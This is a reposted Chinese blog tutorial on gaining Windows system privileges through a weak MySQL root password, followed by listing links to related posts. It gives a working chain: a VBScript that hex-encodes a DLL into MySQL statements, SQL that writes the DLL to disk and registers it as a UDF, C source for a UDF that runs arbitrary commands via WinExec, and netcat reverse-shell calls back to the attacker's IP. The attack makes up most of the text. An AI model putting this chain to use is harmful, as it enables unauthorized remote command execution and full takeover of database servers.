Mysql弱口令得到系统权限

转载 2011年01月19日 15:36:00

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!

  首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。

  思路很简单,网上也有一些教程,但是他们要么没有给具体的代码,要么一句话代过,搞得象我似得小菜很难理解,终于在我付出了几天得不断测试得辛勤劳动后,有了点结果,我把详细过程和相关代码得交给大家,这样大家就可以自己写dll文件,自己生成不同文件得二进制码啦!

  下面,我们先说如何生成二进制文件得上传脚本。看看这段mysql脚本代码(网友Mix用的方法):

  set @a = concat('',0x0123abc1312389…..);

  set @a = concat(@a,0x4658978abc545e……);

  ………………….

  create table Mix(data LONGBLOB);//建表Mix,字段为data,类型为longblob

  insert into Mix values("");update Mix set data = @a;//@a插入表Mix

  select data from Mix into DUMPFILE 'C://Winnt//文件名';//导出表中内容为文件

  前两句很熟悉把,这个就是我们以前注入的时候,绕过’的解决办法,把代码的16进制数声明给一个变量,然后导入这个变量就行了。只不过这里,因为16进制代码是一个文件的内容,代码太长了,所以就用了concat函数不断把上次得代码类加起来,这样不断累计到一个变量a中。后面几句就很简单了,我都有注释。

  后面三句好说,但是前面的那么多16进制数据,手工的话,累人啊!不过你还记得以前有一个exe2bat.vbs脚本吗?这次我们可以把这个脚本修改一下后,得到我们这里需要得mysql脚本!对比exe2bat.vbs生成得文件和我们需要脚本的文件格式,我们可以轻松的得到我们所需的脚本。脚本内容如下:

  fp=wscript.arguments(0

  fn=right(fp,len(fp)-instrrev(fp,"/"))

  with createobject("adodb.stream")

  .type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)

  end with

  sll=sl mod 65536:slh=sl/65536

  with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

  .write "set @a = concat('',0x"

  for i=1 to sl

  bt=ascb(midb(str,i,1))

  if bt<16 then .write "0"

  .write hex(bt)

  if i mod 128=0 then .write ");"+vbcrlf+"set @a = concat(@a,0x"

  next

  end with

  好了,现在只要你把所要上传的文件拖到这个脚本图标上面,就可以生成一个同名的txt文件了。这个txt文件,就是我们所需要的mysql脚本,当然我们还需要修改一下这个txt文件(毕竟他是我们偷工减料得来的!),把最后一行生成的多余的那句“set @a = concat('',0x”删除了,加上建表,插值得那三句代码即可!

  脚本生成了,如何上传?先登陆mysql服务器:

  C:/>mysql -u root -h hostip -p

  Mysql>use mysql; //先进入mysql默认得数据库,否则你下一步的表将不知道属于哪个库

  Mysql>/. E:/*.dll.txt; //这儿就是你生成的mysql脚本

  按照上面输入命令,就可以看见屏幕文字飞快闪烁(当然网速要快啦),不一会你的文件旧上传完毕了!

  下面到达我们的重点,我们上传什么dll文件?就目前我再网上看到的有两个已经写好的dll文件,一个是Mix写得mix.dll,一个是envymask写得my_udf.dll,这两个我都用过,都很不错,但是都也有点不足。先来看看具体的使用过程吧!

  先用mix.dll:

  登陆mysql,输入命令:

  Mysql> /. e:/mix.dll.txt;

  Mysql> Create FUNCTION Mixconnect RETURNS STRING SONAME 'C://windows//mix.dll';

  //这儿的注册的Mixconnect就是在我们dll文件中实现的函数,我们将要用他执行系统命令!

  Mysql> select Mixconnect('你的ip','8080'); //填写你的反弹ip和端口

  过一会儿,你监听8080端口的nc,就会得到一个系统权限的shell了!如图1:

  这个的确不错,通过反弹得到得shell可以传过一些防火墙,可惜的是,它的这个函数没有写得很好,只能执行一次,当你第二次连接数据库后,再次运行“select Mixconnect('你的ip','8080');”的时候,对方的mysql会当掉!报错,然后服务停止!

  所以,使用mix.dll你只有一次成功,没有再来一次的机会!另外根据我的测试,他对Win2003的系统好像不起作用。

  再用my_udf.dll:

  Mysql>/. C:/my_udf.dll.txt

  Mysql> Create FUNCTION my_udfdoor RETURNS STRING SONAME 'C://winnt//my_udf.dll';

  //同样地,my_udfdoor也是我们注册后,用来执行系统命令得函数

  Mysql> select my_udfdoor('’); //这儿可以随便写my_udfdoor得参数,相当于我们只是要激活这个函数

  好了,现在你可以不用关这个shell了,我们再开一个cmd,使用:

  D:/>nc hostip 3306

  *

  4.0.*-nt x$Eo~MCG f**k //看到这个后,输入“f**k” ,他是my_udfdoor默认密码,自己无法更改

  过一会儿,你就有了系统权限的shell了,

  由于他是hook recv版,所以穿墙的能力很强,我是在上一个mix.dll反弹失败的情况下,才使用这个得,他果然不负所望!进系统后,发现它有双网卡,天网防火墙个人版V2.73,对外仅仅开放3306端口,由此可见,my_udf.dll确实有很强的穿透防火墙得能力!但是他也有一个bug,就是再我们连接激活这个函数后(就是使用了命令“select my_udfdoor('’);”后),不管你是否连接,只要执行了:

  Mysql>drop function my_udfdoor; 后,mysql也汇报错,然后挂掉,

  所以,你使用这个dll文件无法删除你的痕迹!

  最后,然我们自己写一个自定义的dll文件。看能不能解决问题。

  我们仅仅使用mysql 得udf的示例作模版即可!看他的示例:

  #i nclude <stdlib.h>

  #i nclude <winsock.h>

  #i nclude <mysql.h>

  extern "C" {

  char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

  char *error);

  // 兼容C

  }

  char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,

  char *error)

  {

  char * me = "my name";

  return me;

  // 调用此UDF将返回 my name

  }

  十分简单吧?好,我们只需要稍微改一下就可以有了自己的dll文件了:

  下面是我的一个哥们Crackme是修改的:

  #i nclude <stdlib.h>

  #i nclude <windows.h>

  #i nclude "mysql.h"

  extern "C" __declspec(dllexport)char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error);// sys_name就是函数名,你可以任意修改

  __declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) //当然这儿的sys_name也得改!

  {

  char me[256] = {0};

  if (args->arg_count == 1){

  strncpy(me,args->args[0],args->lengths[0]);

  me[args->lengths[0]]='/0';

  WinExec(me,SW_HIDE); //就是用它来执行任意命令

  }else

  strcpy(me,"do nonthing./n");

  return me;

  }

  好,我们编译成sysudf.dll文件就可以了!我们来用他实验一把!

  看操作:

  Mysql>/. C:/sysudf.dll.txt

  Mysql>Create function sys_name returns string soname 'C://windows//sysudf.dll';

  Mysql>/. Nc.exe.txt //把nc.exe也上传上去

  Mysql>select sys_name('nc.exe -e cmd.exe 我的ip 8080');

  //sys_name参数只有一个,参数指定要执行的系统命令

  好,看看在Win2003中的一个反弹shell了,

  当然,我们你也可以不反弹shell了,而去执行其他命令,只不过不论是否执行成功,都没有回显,所以要保证命令格式正确。对于这个dll文件,经过测试,不论何时“drop function sys_name;”,都是不会报错的,同时也可以多次运行不同命令。至于他的缺点,就是他的穿墙能力跟Mix.dll一样不算太强,但对于实在穿不透的墙,直接运行其他命令就是最好的选择了。

  上面三个dll文件可谓各有所短,如何选择,就看你遇到的实际情况了。

  好了,从脚本得编写使用到dll文件编写使用,说了这么多,现在大家应该都会了吧?题目说的是弱口令得到系统权限,但是如果你在注入等其他过程中,爆出了config.php中的mysql密码,不也是可以使用的吗?这样我们岂不是也找到继Serv-u后又一大提权方法了吗?

教你如何通过Mysql弱口令得到系统权限

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到! 首先,我简单说一下mysql弱口令得到系统...
  • u013673367
  • u013673367
  • 2014年03月07日 19:51
  • 1424

教你如何通过Mysql弱口令得到系统权限

很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!      首先,我简单说一下mysql弱口令得...
  • kuxing100
  • kuxing100
  • 2013年02月23日 20:53
  • 269

使用MySQL密码插件杜绝账户弱口令

从MySQL 5.6.6版本起,提供了密码插件(validate_password )用于检查密码强度提高安全性。在数据库中安装并启用密码插件后,在create user、alter user(5.7...
  • hrbhanyu
  • hrbhanyu
  • 2017年03月02日 15:04
  • 355

防扫描配置与弱口令利用,检测和防御

弱口令利用,检测和防御
  • pygain
  • pygain
  • 2016年08月27日 09:48
  • 1340

互联网公司站点通病之弱口令

在补天平台经常看到@合肥滨湖虎子 这样的大牛刷通用,这些通用系统有开源的也有不开源的。但是像用友,shopex这些非开源系统做黑盒测试,会非常困难。作为新闻专业的学生我很好奇:这些大牛到底是通过什么方...
  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:48
  • 330

web入侵二之弱口令攻击及其他

一、什么是弱口令   就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果   二、共享入侵--I...
  • jiangliuzheng
  • jiangliuzheng
  • 2015年12月30日 17:14
  • 3789

弱口令字典1500

123456789 1234567890 a123456789 123456 qq123456 abc123456 123456789a WOAINI1314 12345678 11...
  • rongyongfeikai2
  • rongyongfeikai2
  • 2017年03月29日 17:54
  • 4948

ssh弱口令扫描(golang版本)

0x00 今天
  • winkar
  • winkar
  • 2014年09月18日 18:53
  • 2185

漏洞-弱口令介绍与自动攻击示范

基本漏洞类型与弱口令top100, web测试密码爆破遍历与弱口令尝试神器Burp的攻击演示...
  • dalerkd
  • dalerkd
  • 2016年11月07日 00:29
  • 889

历次泄密门+常用弱口令字典集合

这个字典制作的可不容易,先是把历来我自存的各类字典打包上传到服务器上花费了一天时间;又把本坛各位网友历次制作的字典打包上传又是一晚上的时间; 字典处理服务器是借朋友的,朋友的新webserver需要...
  • u013613428
  • u013613428
  • 2016年06月16日 14:40
  • 7011
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Mysql弱口令得到系统权限
举报原因:
原因补充:

(最多只允许输入30个字)